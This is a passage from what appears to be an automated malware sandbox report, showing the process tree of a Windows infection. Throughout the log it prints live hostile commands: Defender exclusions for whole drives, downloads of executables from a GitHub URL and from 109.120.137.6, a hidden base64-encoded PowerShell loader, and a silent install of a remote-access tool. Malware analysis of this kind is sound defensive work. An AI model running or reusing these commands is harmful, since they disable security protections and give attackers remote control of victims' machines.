                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:424
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413870101\YGYZCmt.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413870101\YGYZCmt.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:7032
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:6988
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413880101\Rm3cVPI.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413880101\Rm3cVPI.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:7372
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413890101\p3hx1_003.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413890101\p3hx1_003.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:8096
                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                  5⤵
                                                                                                                                    PID:8160
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                      6⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:1912
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    "C:\Windows\system32\svchost.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Downloads MZ/PE file
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:7160
                                                                                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4828
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4948
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413900101\qWR3lUj.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413900101\qWR3lUj.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:7304
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    5⤵
                                                                                                                                      PID:5168
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:3360
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413910101\TbV75ZR.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413910101\TbV75ZR.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:9512
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\jxdsxp', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                        5⤵
                                                                                                                                          PID:9992
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\jxdsxp', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                            6⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            PID:10008
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/brtiuoapgbtkadaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\jxdsxp\gsuilgw.exe'"
                                                                                                                                          5⤵
                                                                                                                                            PID:10368
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/brtiuoapgbtkadaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\jxdsxp\gsuilgw.exe'"
                                                                                                                                              6⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:10360
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413921121\5ym0ZYg.cmd"
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:10236
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413921121\5ym0ZYg.cmd"
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:10304
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                              6⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:10536
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                                7⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:10708
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10413930101\f3e59910db.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10413930101\f3e59910db.exe"
                                                                                                                                          4⤵
                                                                                                                                            PID:10956
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413940101\PQPYAYJJ.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413940101\PQPYAYJJ.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:11408
                                                                                                                                              • C:\Users\Admin\Abspawnhlp.exe
                                                                                                                                                "C:\Users\Admin\Abspawnhlp.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:11576
                                                                                                                                                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                    6⤵
                                                                                                                                                      PID:11656
                                                                                                                                                      • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                        7⤵
                                                                                                                                                          PID:10264
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413950101\captcha.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413950101\captcha.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4448
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413960101\7IIl2eE.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413960101\7IIl2eE.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:9340
                                                                                                                                                        • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                          "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                          5⤵
                                                                                                                                                            PID:9672
                                                                                                                                                    • C:\Users\Admin\AppData\Local\L0dvVC19EqLU.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\L0dvVC19EqLU.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:3324
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:4076
                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                    1⤵
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:3964
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:5112
                                                                                                                                                      • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:4788
                                                                                                                                                        • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                          4⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1912
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                                                                                                                            5⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3696
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\temp_647324.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\temp_647324.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:9916
                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                  "C:\Windows\System32\attrib.exe" +s +h "C:\Program Files (x86)\Remote Manipulator System - Host\desktop.ini"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Sets file to hidden
                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                  PID:10844
                                                                                                                                                                • C:\Windows\regedit.exe
                                                                                                                                                                  "C:\Windows\regedit.exe" /s "C:\Program Files (x86)\Remote Manipulator System - Host\reg.reg"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Runs .reg file with regedit
                                                                                                                                                                  PID:3956
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cd /d "C:\Program Files (x86)\Remote Manipulator System - Host\" && rutserv.exe /silentinstall && rutserv.exe /firewall && rutserv.exe /start && exit
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:10940
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    "C:\Windows\System32\attrib.exe" +s +h "C:\Program Files (x86)\Remote Manipulator System - Host\*.*"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                    PID:11124
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    "C:\Windows\System32\attrib.exe" +s +h "C:\Program Files (x86)\Remote Manipulator System - Host"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                    PID:10568
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5720
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1536
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:1592
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              C:\Windows\System32\cmd.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4364
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                4⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1248
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:916
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:5540
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                                4⤵
                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:1376
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                4⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:7652
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4296 -ip 4296
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1184
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4100
                                                                                                                                                            • C:\Windows\system32\svchost.exe
